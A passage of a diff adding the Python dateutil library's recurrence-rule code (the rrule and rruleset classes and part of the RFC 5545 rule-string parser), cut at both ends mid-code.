+ :param until: + If given, this must be a datetime instance specifying the upper-bound + limit of the recurrence. The last recurrence in the rule is the greatest + datetime that is less than or equal to the value specified in the + ``until`` parameter. + + .. note:: + As of version 2.5.0, the use of the keyword ``until`` in conjunction + with ``count`` is deprecated, to make sure ``dateutil`` is fully + compliant with `RFC-5545 Sec. 3.3.10 `_. Therefore, ``until`` and ``count`` + **must not** occur in the same call to ``rrule``. + :param bysetpos: + If given, it must be either an integer, or a sequence of integers, + positive or negative. Each given integer will specify an occurrence + number, corresponding to the nth occurrence of the rule inside the + frequency period. For example, a bysetpos of -1 if combined with a + MONTHLY frequency, and a byweekday of (MO, TU, WE, TH, FR), will + result in the last work day of every month. + :param bymonth: + If given, it must be either an integer, or a sequence of integers, + meaning the months to apply the recurrence to. + :param bymonthday: + If given, it must be either an integer, or a sequence of integers, + meaning the month days to apply the recurrence to. + :param byyearday: + If given, it must be either an integer, or a sequence of integers, + meaning the year days to apply the recurrence to. + :param byeaster: + If given, it must be either an integer, or a sequence of integers, + positive or negative. Each integer will define an offset from the + Easter Sunday. Passing the offset 0 to byeaster will yield the Easter + Sunday itself. This is an extension to the RFC specification. + :param byweekno: + If given, it must be either an integer, or a sequence of integers, + meaning the week numbers to apply the recurrence to. Week numbers + have the meaning described in ISO8601, that is, the first week of + the year is that containing at least four days of the new year. + :param byweekday: + If given, it must be either an integer (0 == MO), a sequence of + integers, one of the weekday constants (MO, TU, etc), or a sequence + of these constants. When given, these variables will define the + weekdays where the recurrence will be applied. It's also possible to + use an argument n for the weekday instances, which will mean the nth + occurrence of this weekday in the period. For example, with MONTHLY, + or with YEARLY and BYMONTH, using FR(+1) in byweekday will specify the + first friday of the month where the recurrence happens. Notice that in + the RFC documentation, this is specified as BYDAY, but was renamed to + avoid the ambiguity of that keyword. + :param byhour: + If given, it must be either an integer, or a sequence of integers, + meaning the hours to apply the recurrence to. + :param byminute: + If given, it must be either an integer, or a sequence of integers, + meaning the minutes to apply the recurrence to. + :param bysecond: + If given, it must be either an integer, or a sequence of integers, + meaning the seconds to apply the recurrence to. + :param cache: + If given, it must be a boolean value specifying to enable or disable + caching of results. If you will use the same rrule instance multiple + times, enabling caching will improve the performance considerably. + """ + def __init__(self, freq, dtstart=None, + interval=1, wkst=None, count=None, until=None, bysetpos=None, + bymonth=None, bymonthday=None, byyearday=None, byeaster=None, + byweekno=None, byweekday=None, + byhour=None, byminute=None, bysecond=None, + cache=False): + super(rrule, self).__init__(cache) + global easter + if not dtstart: + if until and until.tzinfo: + dtstart = datetime.datetime.now(tz=until.tzinfo).replace(microsecond=0) + else: + dtstart = datetime.datetime.now().replace(microsecond=0) + elif not isinstance(dtstart, datetime.datetime): + dtstart = datetime.datetime.fromordinal(dtstart.toordinal()) + else: + dtstart = dtstart.replace(microsecond=0) + self._dtstart = dtstart + self._tzinfo = dtstart.tzinfo + self._freq = freq + self._interval = interval + self._count = count + + # Cache the original byxxx rules, if they are provided, as the _byxxx + # attributes do not necessarily map to the inputs, and this can be + # a problem in generating the strings. Only store things if they've + # been supplied (the string retrieval will just use .get()) + self._original_rule = {} + + if until and not isinstance(until, datetime.datetime): + until = datetime.datetime.fromordinal(until.toordinal()) + self._until = until + + if self._dtstart and self._until: + if (self._dtstart.tzinfo is not None) != (self._until.tzinfo is not None): + # According to RFC5545 Section 3.3.10: + # https://tools.ietf.org/html/rfc5545#section-3.3.10 + # + # > If the "DTSTART" property is specified as a date with UTC + # > time or a date with local time and time zone reference, + # > then the UNTIL rule part MUST be specified as a date with + # > UTC time. + raise ValueError( + 'RRULE UNTIL values must be specified in UTC when DTSTART ' + 'is timezone-aware' + ) + + if count is not None and until: + warn("Using both 'count' and 'until' is inconsistent with RFC 5545" + " and has been deprecated in dateutil. Future versions will " + "raise an error.", DeprecationWarning) + + if wkst is None: + self._wkst = calendar.firstweekday() + elif isinstance(wkst, integer_types): + self._wkst = wkst + else: + self._wkst = wkst.weekday + + if bysetpos is None: + self._bysetpos = None + elif isinstance(bysetpos, integer_types): + if bysetpos == 0 or not (-366 <= bysetpos <= 366): + raise ValueError("bysetpos must be between 1 and 366, " + "or between -366 and -1") + self._bysetpos = (bysetpos,) + else: + self._bysetpos = tuple(bysetpos) + for pos in self._bysetpos: + if pos == 0 or not (-366 <= pos <= 366): + raise ValueError("bysetpos must be between 1 and 366, " + "or between -366 and -1") + + if self._bysetpos: + self._original_rule['bysetpos'] = self._bysetpos + + if (byweekno is None and byyearday is None and bymonthday is None and + byweekday is None and byeaster is None): + if freq == YEARLY: + if bymonth is None: + bymonth = dtstart.month + self._original_rule['bymonth'] = None + bymonthday = dtstart.day + self._original_rule['bymonthday'] = None + elif freq == MONTHLY: + bymonthday = dtstart.day + self._original_rule['bymonthday'] = None + elif freq == WEEKLY: + byweekday = dtstart.weekday() + self._original_rule['byweekday'] = None + + # bymonth + if bymonth is None: + self._bymonth = None + else: + if isinstance(bymonth, integer_types): + bymonth = (bymonth,) + + self._bymonth = tuple(sorted(set(bymonth))) + + if 'bymonth' not in self._original_rule: + self._original_rule['bymonth'] = self._bymonth + + # byyearday + if byyearday is None: + self._byyearday = None + else: + if isinstance(byyearday, integer_types): + byyearday = (byyearday,) + + self._byyearday = tuple(sorted(set(byyearday))) + self._original_rule['byyearday'] = self._byyearday + + # byeaster + if byeaster is not None: + if not easter: + from dateutil import easter + if isinstance(byeaster, integer_types): + self._byeaster = (byeaster,) + else: + self._byeaster = tuple(sorted(byeaster)) + + self._original_rule['byeaster'] = self._byeaster + else: + self._byeaster = None + + # bymonthday + if bymonthday is None: + self._bymonthday = () + self._bynmonthday = () + else: + if isinstance(bymonthday, integer_types): + bymonthday = (bymonthday,) + + bymonthday = set(bymonthday) # Ensure it's unique + + self._bymonthday = tuple(sorted(x for x in bymonthday if x > 0)) + self._bynmonthday = tuple(sorted(x for x in bymonthday if x < 0)) + + # Storing positive numbers first, then negative numbers + if 'bymonthday' not in self._original_rule: + self._original_rule['bymonthday'] = tuple( + itertools.chain(self._bymonthday, self._bynmonthday)) + + # byweekno + if byweekno is None: + self._byweekno = None + else: + if isinstance(byweekno, integer_types): + byweekno = (byweekno,) + + self._byweekno = tuple(sorted(set(byweekno))) + + self._original_rule['byweekno'] = self._byweekno + + # byweekday / bynweekday + if byweekday is None: + self._byweekday = None + self._bynweekday = None + else: + # If it's one of the valid non-sequence types, convert to a + # single-element sequence before the iterator that builds the + # byweekday set. + if isinstance(byweekday, integer_types) or hasattr(byweekday, "n"): + byweekday = (byweekday,) + + self._byweekday = set() + self._bynweekday = set() + for wday in byweekday: + if isinstance(wday, integer_types): + self._byweekday.add(wday) + elif not wday.n or freq > MONTHLY: + self._byweekday.add(wday.weekday) + else: + self._bynweekday.add((wday.weekday, wday.n)) + + if not self._byweekday: + self._byweekday = None + elif not self._bynweekday: + self._bynweekday = None + + if self._byweekday is not None: + self._byweekday = tuple(sorted(self._byweekday)) + orig_byweekday = [weekday(x) for x in self._byweekday] + else: + orig_byweekday = () + + if self._bynweekday is not None: + self._bynweekday = tuple(sorted(self._bynweekday)) + orig_bynweekday = [weekday(*x) for x in self._bynweekday] + else: + orig_bynweekday = () + + if 'byweekday' not in self._original_rule: + self._original_rule['byweekday'] = tuple(itertools.chain( + orig_byweekday, orig_bynweekday)) + + # byhour + if byhour is None: + if freq < HOURLY: + self._byhour = {dtstart.hour} + else: + self._byhour = None + else: + if isinstance(byhour, integer_types): + byhour = (byhour,) + + if freq == HOURLY: + self._byhour = self.__construct_byset(start=dtstart.hour, + byxxx=byhour, + base=24) + else: + self._byhour = set(byhour) + + self._byhour = tuple(sorted(self._byhour)) + self._original_rule['byhour'] = self._byhour + + # byminute + if byminute is None: + if freq < MINUTELY: + self._byminute = {dtstart.minute} + else: + self._byminute = None + else: + if isinstance(byminute, integer_types): + byminute = (byminute,) + + if freq == MINUTELY: + self._byminute = self.__construct_byset(start=dtstart.minute, + byxxx=byminute, + base=60) + else: + self._byminute = set(byminute) + + self._byminute = tuple(sorted(self._byminute)) + self._original_rule['byminute'] = self._byminute + + # bysecond + if bysecond is None: + if freq < SECONDLY: + self._bysecond = ((dtstart.second,)) + else: + self._bysecond = None + else: + if isinstance(bysecond, integer_types): + bysecond = (bysecond,) + + self._bysecond = set(bysecond) + + if freq == SECONDLY: + self._bysecond = self.__construct_byset(start=dtstart.second, + byxxx=bysecond, + base=60) + else: + self._bysecond = set(bysecond) + + self._bysecond = tuple(sorted(self._bysecond)) + self._original_rule['bysecond'] = self._bysecond + + if self._freq >= HOURLY: + self._timeset = None + else: + self._timeset = [] + for hour in self._byhour: + for minute in self._byminute: + for second in self._bysecond: + self._timeset.append( + datetime.time(hour, minute, second, + tzinfo=self._tzinfo)) + self._timeset.sort() + self._timeset = tuple(self._timeset) + + def __str__(self): + """ + Output a string that would generate this RRULE if passed to rrulestr. + This is mostly compatible with RFC5545, except for the + dateutil-specific extension BYEASTER. + """ + + output = [] + h, m, s = [None] * 3 + if self._dtstart: + output.append(self._dtstart.strftime('DTSTART:%Y%m%dT%H%M%S')) + h, m, s = self._dtstart.timetuple()[3:6] + + parts = ['FREQ=' + FREQNAMES[self._freq]] + if self._interval != 1: + parts.append('INTERVAL=' + str(self._interval)) + + if self._wkst: + parts.append('WKST=' + repr(weekday(self._wkst))[0:2]) + + if self._count is not None: + parts.append('COUNT=' + str(self._count)) + + if self._until: + parts.append(self._until.strftime('UNTIL=%Y%m%dT%H%M%S')) + + if self._original_rule.get('byweekday') is not None: + # The str() method on weekday objects doesn't generate + # RFC5545-compliant strings, so we should modify that. + original_rule = dict(self._original_rule) + wday_strings = [] + for wday in original_rule['byweekday']: + if wday.n: + wday_strings.append('{n:+d}{wday}'.format( + n=wday.n, + wday=repr(wday)[0:2])) + else: + wday_strings.append(repr(wday)) + + original_rule['byweekday'] = wday_strings + else: + original_rule = self._original_rule + + partfmt = '{name}={vals}' + for name, key in [('BYSETPOS', 'bysetpos'), + ('BYMONTH', 'bymonth'), + ('BYMONTHDAY', 'bymonthday'), + ('BYYEARDAY', 'byyearday'), + ('BYWEEKNO', 'byweekno'), + ('BYDAY', 'byweekday'), + ('BYHOUR', 'byhour'), + ('BYMINUTE', 'byminute'), + ('BYSECOND', 'bysecond'), + ('BYEASTER', 'byeaster')]: + value = original_rule.get(key) + if value: + parts.append(partfmt.format(name=name, vals=(','.join(str(v) + for v in value)))) + + output.append('RRULE:' + ';'.join(parts)) + return '\n'.join(output) + + def replace(self, **kwargs): + """Return new rrule with same attributes except for those attributes given new + values by whichever keyword arguments are specified.""" + new_kwargs = {"interval": self._interval, + "count": self._count, + "dtstart": self._dtstart, + "freq": self._freq, + "until": self._until, + "wkst": self._wkst, + "cache": False if self._cache is None else True } + new_kwargs.update(self._original_rule) + new_kwargs.update(kwargs) + return rrule(**new_kwargs) + + def _iter(self): + year, month, day, hour, minute, second, weekday, yearday, _ = \ + self._dtstart.timetuple() + + # Some local variables to speed things up a bit + freq = self._freq + interval = self._interval + wkst = self._wkst + until = self._until + bymonth = self._bymonth + byweekno = self._byweekno + byyearday = self._byyearday + byweekday = self._byweekday + byeaster = self._byeaster + bymonthday = self._bymonthday + bynmonthday = self._bynmonthday + bysetpos = self._bysetpos + byhour = self._byhour + byminute = self._byminute + bysecond = self._bysecond + + ii = _iterinfo(self) + ii.rebuild(year, month) + + getdayset = {YEARLY: ii.ydayset, + MONTHLY: ii.mdayset, + WEEKLY: ii.wdayset, + DAILY: ii.ddayset, + HOURLY: ii.ddayset, + MINUTELY: ii.ddayset, + SECONDLY: ii.ddayset}[freq] + + if freq < HOURLY: + timeset = self._timeset + else: + gettimeset = {HOURLY: ii.htimeset, + MINUTELY: ii.mtimeset, + SECONDLY: ii.stimeset}[freq] + if ((freq >= HOURLY and + self._byhour and hour not in self._byhour) or + (freq >= MINUTELY and + self._byminute and minute not in self._byminute) or + (freq >= SECONDLY and + self._bysecond and second not in self._bysecond)): + timeset = () + else: + timeset = gettimeset(hour, minute, second) + + total = 0 + count = self._count + while True: + # Get dayset with the right frequency + dayset, start, end = getdayset(year, month, day) + + # Do the "hard" work ;-) + filtered = False + for i in dayset[start:end]: + if ((bymonth and ii.mmask[i] not in bymonth) or + (byweekno and not ii.wnomask[i]) or + (byweekday and ii.wdaymask[i] not in byweekday) or + (ii.nwdaymask and not ii.nwdaymask[i]) or + (byeaster and not ii.eastermask[i]) or + ((bymonthday or bynmonthday) and + ii.mdaymask[i] not in bymonthday and + ii.nmdaymask[i] not in bynmonthday) or + (byyearday and + ((i < ii.yearlen and i+1 not in byyearday and + -ii.yearlen+i not in byyearday) or + (i >= ii.yearlen and i+1-ii.yearlen not in byyearday and + -ii.nextyearlen+i-ii.yearlen not in byyearday)))): + dayset[i] = None + filtered = True + + # Output results + if bysetpos and timeset: + poslist = [] + for pos in bysetpos: + if pos < 0: + daypos, timepos = divmod(pos, len(timeset)) + else: + daypos, timepos = divmod(pos-1, len(timeset)) + try: + i = [x for x in dayset[start:end] + if x is not None][daypos] + time = timeset[timepos] + except IndexError: + pass + else: + date = datetime.date.fromordinal(ii.yearordinal+i) + res = datetime.datetime.combine(date, time) + if res not in poslist: + poslist.append(res) + poslist.sort() + for res in poslist: + if until and res > until: + self._len = total + return + elif res >= self._dtstart: + if count is not None: + count -= 1 + if count < 0: + self._len = total + return + total += 1 + yield res + else: + for i in dayset[start:end]: + if i is not None: + date = datetime.date.fromordinal(ii.yearordinal + i) + for time in timeset: + res = datetime.datetime.combine(date, time) + if until and res > until: + self._len = total + return + elif res >= self._dtstart: + if count is not None: + count -= 1 + if count < 0: + self._len = total + return + + total += 1 + yield res + + # Handle frequency and interval + fixday = False + if freq == YEARLY: + year += interval + if year > datetime.MAXYEAR: + self._len = total + return + ii.rebuild(year, month) + elif freq == MONTHLY: + month += interval + if month > 12: + div, mod = divmod(month, 12) + month = mod + year += div + if month == 0: + month = 12 + year -= 1 + if year > datetime.MAXYEAR: + self._len = total + return + ii.rebuild(year, month) + elif freq == WEEKLY: + if wkst > weekday: + day += -(weekday+1+(6-wkst))+self._interval*7 + else: + day += -(weekday-wkst)+self._interval*7 + weekday = wkst + fixday = True + elif freq == DAILY: + day += interval + fixday = True + elif freq == HOURLY: + if filtered: + # Jump to one iteration before next day + hour += ((23-hour)//interval)*interval + + if byhour: + ndays, hour = self.__mod_distance(value=hour, + byxxx=self._byhour, + base=24) + else: + ndays, hour = divmod(hour+interval, 24) + + if ndays: + day += ndays + fixday = True + + timeset = gettimeset(hour, minute, second) + elif freq == MINUTELY: + if filtered: + # Jump to one iteration before next day + minute += ((1439-(hour*60+minute))//interval)*interval + + valid = False + rep_rate = (24*60) + for j in range(rep_rate // gcd(interval, rep_rate)): + if byminute: + nhours, minute = \ + self.__mod_distance(value=minute, + byxxx=self._byminute, + base=60) + else: + nhours, minute = divmod(minute+interval, 60) + + div, hour = divmod(hour+nhours, 24) + if div: + day += div + fixday = True + filtered = False + + if not byhour or hour in byhour: + valid = True + break + + if not valid: + raise ValueError('Invalid combination of interval and ' + + 'byhour resulting in empty rule.') + + timeset = gettimeset(hour, minute, second) + elif freq == SECONDLY: + if filtered: + # Jump to one iteration before next day + second += (((86399 - (hour * 3600 + minute * 60 + second)) + // interval) * interval) + + rep_rate = (24 * 3600) + valid = False + for j in range(0, rep_rate // gcd(interval, rep_rate)): + if bysecond: + nminutes, second = \ + self.__mod_distance(value=second, + byxxx=self._bysecond, + base=60) + else: + nminutes, second = divmod(second+interval, 60) + + div, minute = divmod(minute+nminutes, 60) + if div: + hour += div + div, hour = divmod(hour, 24) + if div: + day += div + fixday = True + + if ((not byhour or hour in byhour) and + (not byminute or minute in byminute) and + (not bysecond or second in bysecond)): + valid = True + break + + if not valid: + raise ValueError('Invalid combination of interval, ' + + 'byhour and byminute resulting in empty' + + ' rule.') + + timeset = gettimeset(hour, minute, second) + + if fixday and day > 28: + daysinmonth = calendar.monthrange(year, month)[1] + if day > daysinmonth: + while day > daysinmonth: + day -= daysinmonth + month += 1 + if month == 13: + month = 1 + year += 1 + if year > datetime.MAXYEAR: + self._len = total + return + daysinmonth = calendar.monthrange(year, month)[1] + ii.rebuild(year, month) + + def __construct_byset(self, start, byxxx, base): + """ + If a `BYXXX` sequence is passed to the constructor at the same level as + `FREQ` (e.g. `FREQ=HOURLY,BYHOUR={2,4,7},INTERVAL=3`), there are some + specifications which cannot be reached given some starting conditions. + + This occurs whenever the interval is not coprime with the base of a + given unit and the difference between the starting position and the + ending position is not coprime with the greatest common denominator + between the interval and the base. For example, with a FREQ of hourly + starting at 17:00 and an interval of 4, the only valid values for + BYHOUR would be {21, 1, 5, 9, 13, 17}, because 4 and 24 are not + coprime. + + :param start: + Specifies the starting position. + :param byxxx: + An iterable containing the list of allowed values. + :param base: + The largest allowable value for the specified frequency (e.g. + 24 hours, 60 minutes). + + This does not preserve the type of the iterable, returning a set, since + the values should be unique and the order is irrelevant, this will + speed up later lookups. + + In the event of an empty set, raises a :exception:`ValueError`, as this + results in an empty rrule. + """ + + cset = set() + + # Support a single byxxx value. + if isinstance(byxxx, integer_types): + byxxx = (byxxx, ) + + for num in byxxx: + i_gcd = gcd(self._interval, base) + # Use divmod rather than % because we need to wrap negative nums. + if i_gcd == 1 or divmod(num - start, i_gcd)[1] == 0: + cset.add(num) + + if len(cset) == 0: + raise ValueError("Invalid rrule byxxx generates an empty set.") + + return cset + + def __mod_distance(self, value, byxxx, base): + """ + Calculates the next value in a sequence where the `FREQ` parameter is + specified along with a `BYXXX` parameter at the same "level" + (e.g. `HOURLY` specified with `BYHOUR`). + + :param value: + The old value of the component. + :param byxxx: + The `BYXXX` set, which should have been generated by + `rrule._construct_byset`, or something else which checks that a + valid rule is present. + :param base: + The largest allowable value for the specified frequency (e.g. + 24 hours, 60 minutes). + + If a valid value is not found after `base` iterations (the maximum + number before the sequence would start to repeat), this raises a + :exception:`ValueError`, as no valid values were found. + + This returns a tuple of `divmod(n*interval, base)`, where `n` is the + smallest number of `interval` repetitions until the next specified + value in `byxxx` is found. + """ + accumulator = 0 + for ii in range(1, base + 1): + # Using divmod() over % to account for negative intervals + div, value = divmod(value + self._interval, base) + accumulator += div + if value in byxxx: + return (accumulator, value) + + +class _iterinfo(object): + __slots__ = ["rrule", "lastyear", "lastmonth", + "yearlen", "nextyearlen", "yearordinal", "yearweekday", + "mmask", "mrange", "mdaymask", "nmdaymask", + "wdaymask", "wnomask", "nwdaymask", "eastermask"] + + def __init__(self, rrule): + for attr in self.__slots__: + setattr(self, attr, None) + self.rrule = rrule + + def rebuild(self, year, month): + # Every mask is 7 days longer to handle cross-year weekly periods. + rr = self.rrule + if year != self.lastyear: + self.yearlen = 365 + calendar.isleap(year) + self.nextyearlen = 365 + calendar.isleap(year + 1) + firstyday = datetime.date(year, 1, 1) + self.yearordinal = firstyday.toordinal() + self.yearweekday = firstyday.weekday() + + wday = datetime.date(year, 1, 1).weekday() + if self.yearlen == 365: + self.mmask = M365MASK + self.mdaymask = MDAY365MASK + self.nmdaymask = NMDAY365MASK + self.wdaymask = WDAYMASK[wday:] + self.mrange = M365RANGE + else: + self.mmask = M366MASK + self.mdaymask = MDAY366MASK + self.nmdaymask = NMDAY366MASK + self.wdaymask = WDAYMASK[wday:] + self.mrange = M366RANGE + + if not rr._byweekno: + self.wnomask = None + else: + self.wnomask = [0]*(self.yearlen+7) + # no1wkst = firstwkst = self.wdaymask.index(rr._wkst) + no1wkst = firstwkst = (7-self.yearweekday+rr._wkst) % 7 + if no1wkst >= 4: + no1wkst = 0 + # Number of days in the year, plus the days we got + # from last year. + wyearlen = self.yearlen+(self.yearweekday-rr._wkst) % 7 + else: + # Number of days in the year, minus the days we + # left in last year. + wyearlen = self.yearlen-no1wkst + div, mod = divmod(wyearlen, 7) + numweeks = div+mod//4 + for n in rr._byweekno: + if n < 0: + n += numweeks+1 + if not (0 < n <= numweeks): + continue + if n > 1: + i = no1wkst+(n-1)*7 + if no1wkst != firstwkst: + i -= 7-firstwkst + else: + i = no1wkst + for j in range(7): + self.wnomask[i] = 1 + i += 1 + if self.wdaymask[i] == rr._wkst: + break + if 1 in rr._byweekno: + # Check week number 1 of next year as well + # TODO: Check -numweeks for next year. + i = no1wkst+numweeks*7 + if no1wkst != firstwkst: + i -= 7-firstwkst + if i < self.yearlen: + # If week starts in next year, we + # don't care about it. + for j in range(7): + self.wnomask[i] = 1 + i += 1 + if self.wdaymask[i] == rr._wkst: + break + if no1wkst: + # Check last week number of last year as + # well. If no1wkst is 0, either the year + # started on week start, or week number 1 + # got days from last year, so there are no + # days from last year's last week number in + # this year. + if -1 not in rr._byweekno: + lyearweekday = datetime.date(year-1, 1, 1).weekday() + lno1wkst = (7-lyearweekday+rr._wkst) % 7 + lyearlen = 365+calendar.isleap(year-1) + if lno1wkst >= 4: + lno1wkst = 0 + lnumweeks = 52+(lyearlen + + (lyearweekday-rr._wkst) % 7) % 7//4 + else: + lnumweeks = 52+(self.yearlen-no1wkst) % 7//4 + else: + lnumweeks = -1 + if lnumweeks in rr._byweekno: + for i in range(no1wkst): + self.wnomask[i] = 1 + + if (rr._bynweekday and (month != self.lastmonth or + year != self.lastyear)): + ranges = [] + if rr._freq == YEARLY: + if rr._bymonth: + for month in rr._bymonth: + ranges.append(self.mrange[month-1:month+1]) + else: + ranges = [(0, self.yearlen)] + elif rr._freq == MONTHLY: + ranges = [self.mrange[month-1:month+1]] + if ranges: + # Weekly frequency won't get here, so we may not + # care about cross-year weekly periods. + self.nwdaymask = [0]*self.yearlen + for first, last in ranges: + last -= 1 + for wday, n in rr._bynweekday: + if n < 0: + i = last+(n+1)*7 + i -= (self.wdaymask[i]-wday) % 7 + else: + i = first+(n-1)*7 + i += (7-self.wdaymask[i]+wday) % 7 + if first <= i <= last: + self.nwdaymask[i] = 1 + + if rr._byeaster: + self.eastermask = [0]*(self.yearlen+7) + eyday = easter.easter(year).toordinal()-self.yearordinal + for offset in rr._byeaster: + self.eastermask[eyday+offset] = 1 + + self.lastyear = year + self.lastmonth = month + + def ydayset(self, year, month, day): + return list(range(self.yearlen)), 0, self.yearlen + + def mdayset(self, year, month, day): + dset = [None]*self.yearlen + start, end = self.mrange[month-1:month+1] + for i in range(start, end): + dset[i] = i + return dset, start, end + + def wdayset(self, year, month, day): + # We need to handle cross-year weeks here. + dset = [None]*(self.yearlen+7) + i = datetime.date(year, month, day).toordinal()-self.yearordinal + start = i + for j in range(7): + dset[i] = i + i += 1 + # if (not (0 <= i < self.yearlen) or + # self.wdaymask[i] == self.rrule._wkst): + # This will cross the year boundary, if necessary. + if self.wdaymask[i] == self.rrule._wkst: + break + return dset, start, i + + def ddayset(self, year, month, day): + dset = [None] * self.yearlen + i = datetime.date(year, month, day).toordinal() - self.yearordinal + dset[i] = i + return dset, i, i + 1 + + def htimeset(self, hour, minute, second): + tset = [] + rr = self.rrule + for minute in rr._byminute: + for second in rr._bysecond: + tset.append(datetime.time(hour, minute, second, + tzinfo=rr._tzinfo)) + tset.sort() + return tset + + def mtimeset(self, hour, minute, second): + tset = [] + rr = self.rrule + for second in rr._bysecond: + tset.append(datetime.time(hour, minute, second, tzinfo=rr._tzinfo)) + tset.sort() + return tset + + def stimeset(self, hour, minute, second): + return (datetime.time(hour, minute, second, + tzinfo=self.rrule._tzinfo),) + + +class rruleset(rrulebase): + """ The rruleset type allows more complex recurrence setups, mixing + multiple rules, dates, exclusion rules, and exclusion dates. The type + constructor takes the following keyword arguments: + + :param cache: If True, caching of results will be enabled, improving + performance of multiple queries considerably. """ + + class _genitem(object): + def __init__(self, genlist, gen): + try: + self.dt = advance_iterator(gen) + genlist.append(self) + except StopIteration: + pass + self.genlist = genlist + self.gen = gen + + def __next__(self): + try: + self.dt = advance_iterator(self.gen) + except StopIteration: + if self.genlist[0] is self: + heapq.heappop(self.genlist) + else: + self.genlist.remove(self) + heapq.heapify(self.genlist) + + next = __next__ + + def __lt__(self, other): + return self.dt < other.dt + + def __gt__(self, other): + return self.dt > other.dt + + def __eq__(self, other): + return self.dt == other.dt + + def __ne__(self, other): + return self.dt != other.dt + + def __init__(self, cache=False): + super(rruleset, self).__init__(cache) + self._rrule = [] + self._rdate = [] + self._exrule = [] + self._exdate = [] + + @_invalidates_cache + def rrule(self, rrule): + """ Include the given :py:class:`rrule` instance in the recurrence set + generation. """ + self._rrule.append(rrule) + + @_invalidates_cache + def rdate(self, rdate): + """ Include the given :py:class:`datetime` instance in the recurrence + set generation. """ + self._rdate.append(rdate) + + @_invalidates_cache + def exrule(self, exrule): + """ Include the given rrule instance in the recurrence set exclusion + list. Dates which are part of the given recurrence rules will not + be generated, even if some inclusive rrule or rdate matches them. + """ + self._exrule.append(exrule) + + @_invalidates_cache + def exdate(self, exdate): + """ Include the given datetime instance in the recurrence set + exclusion list. Dates included that way will not be generated, + even if some inclusive rrule or rdate matches them. """ + self._exdate.append(exdate) + + def _iter(self): + rlist = [] + self._rdate.sort() + self._genitem(rlist, iter(self._rdate)) + for gen in [iter(x) for x in self._rrule]: + self._genitem(rlist, gen) + exlist = [] + self._exdate.sort() + self._genitem(exlist, iter(self._exdate)) + for gen in [iter(x) for x in self._exrule]: + self._genitem(exlist, gen) + lastdt = None + total = 0 + heapq.heapify(rlist) + heapq.heapify(exlist) + while rlist: + ritem = rlist[0] + if not lastdt or lastdt != ritem.dt: + while exlist and exlist[0] < ritem: + exitem = exlist[0] + advance_iterator(exitem) + if exlist and exlist[0] is exitem: + heapq.heapreplace(exlist, exitem) + if not exlist or ritem != exlist[0]: + total += 1 + yield ritem.dt + lastdt = ritem.dt + advance_iterator(ritem) + if rlist and rlist[0] is ritem: + heapq.heapreplace(rlist, ritem) + self._len = total + + + + +class _rrulestr(object): + """ Parses a string representation of a recurrence rule or set of + recurrence rules. + + :param s: + Required, a string defining one or more recurrence rules. + + :param dtstart: + If given, used as the default recurrence start if not specified in the + rule string. + + :param cache: + If set ``True`` caching of results will be enabled, improving + performance of multiple queries considerably. + + :param unfold: + If set ``True`` indicates that a rule string is split over more + than one line and should be joined before processing. + + :param forceset: + If set ``True`` forces a :class:`dateutil.rrule.rruleset` to + be returned. + + :param compatible: + If set ``True`` forces ``unfold`` and ``forceset`` to be ``True``. + + :param ignoretz: + If set ``True``, time zones in parsed strings are ignored and a naive + :class:`datetime.datetime` object is returned. + + :param tzids: + If given, a callable or mapping used to retrieve a + :class:`datetime.tzinfo` from a string representation. + Defaults to :func:`dateutil.tz.gettz`. + + :param tzinfos: + Additional time zone names / aliases which may be present in a string + representation. See :func:`dateutil.parser.parse` for more + information. + + :return: + Returns a :class:`dateutil.rrule.rruleset` or + :class:`dateutil.rrule.rrule` + """ + + _freq_map = {"YEARLY": YEARLY, + "MONTHLY": MONTHLY, + "WEEKLY": WEEKLY, + "DAILY": DAILY, + "HOURLY": HOURLY, + "MINUTELY": MINUTELY, + "SECONDLY": SECONDLY} + + _weekday_map = {"MO": 0, "TU": 1, "WE": 2, "TH": 3, + "FR": 4, "SA": 5, "SU": 6} + + def _handle_int(self, rrkwargs, name, value, **kwargs): + rrkwargs[name.lower()] = int(value) + + def _handle_int_list(self, rrkwargs, name, value, **kwargs): + rrkwargs[name.lower()] = [int(x) for x in value.split(',')] + + _handle_INTERVAL = _handle_int + _handle_COUNT = _handle_int + _handle_BYSETPOS = _handle_int_list + _handle_BYMONTH = _handle_int_list + _handle_BYMONTHDAY = _handle_int_list + _handle_BYYEARDAY = _handle_int_list + _handle_BYEASTER = _handle_int_list + _handle_BYWEEKNO = _handle_int_list + _handle_BYHOUR = _handle_int_list + _handle_BYMINUTE = _handle_int_list + _handle_BYSECOND = _handle_int_list + + def _handle_FREQ(self, rrkwargs, name, value, **kwargs): + rrkwargs["freq"] = self._freq_map[value] + + def _handle_UNTIL(self, rrkwargs, name, value, **kwargs): + global parser + if not parser: + from dateutil import parser + try: + rrkwargs["until"] = parser.parse(value, + ignoretz=kwargs.get("ignoretz"), + tzinfos=kwargs.get("tzinfos")) + except ValueError: + raise ValueError("invalid until date") + + def _handle_WKST(self, rrkwargs, name, value, **kwargs): + rrkwargs["wkst"] = self._weekday_map[value] + + def _handle_BYWEEKDAY(self, rrkwargs, name, value, **kwargs): + """ + Two ways to specify this: +1MO or MO(+1) + """ + l = [] + for wday in value.split(','): + if '(' in wday: + # If it's of the form TH(+1), etc. + splt = wday.split('(') + w = splt[0] + n = int(splt[1][:-1]) + elif len(wday): + # If it's of the form +1MO + for i in range(len(wday)): + if wday[i] not in '+-0123456789': + break + n = wday[:i] or None + w = wday[i:] + if n: + n = int(n) + else: + raise ValueError("Invalid (empty) BYDAY specification.") + + l.append(weekdays[self._weekday_map[w]](n)) + rrkwargs["byweekday"] = l + + _handle_BYDAY = _handle_BYWEEKDAY + + def _parse_rfc_rrule(self, line, + dtstart=None, + cache=False, + ignoretz=False, + tzinfos=None): + if line.find(':') != -1: + name, value = line.split(':') + if name != "RRULE": + raise ValueError("unknown parameter name") + else: + value = line + rrkwargs = {} + for pair in value.split(';'): + name, value = pair.split('=') + name = name.upper() + value = value.upper() + try: + getattr(self, "_handle_"+name)(rrkwargs, name, value, + ignoretz=ignoretz, + tzinfos=tzinfos) + except AttributeError: + raise ValueError("unknown parameter '%s'" % name) + except (KeyError, ValueError): + raise ValueError("invalid '%s': %s" % (name, value)) + return rrule(dtstart=dtstart, cache=cache, **rrkwargs) + + def _parse_date_value(self, date_value, parms, rule_tzids, + ignoretz, tzids, tzinfos): + global parser + if not parser: + from dateutil import parser + + datevals = [] + value_found = False + TZID = None + + for parm in parms: + if parm.startswith("TZID="): + try: + tzkey = rule_tzids[parm.split('TZID=')[-1]] + except KeyError: + continue + if tzids is None: + from . import tz + tzlookup = tz.gettz + elif callable(tzids): + tzlookup = tzids + 